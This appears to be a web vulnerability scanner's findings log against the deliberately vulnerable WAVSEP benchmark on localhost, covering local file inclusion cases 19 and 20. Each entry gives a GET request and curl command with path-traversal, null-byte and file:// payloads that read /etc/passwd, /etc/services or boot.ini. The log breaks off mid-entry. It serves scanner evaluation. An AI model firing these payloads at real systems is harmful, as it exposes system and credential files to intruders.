Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
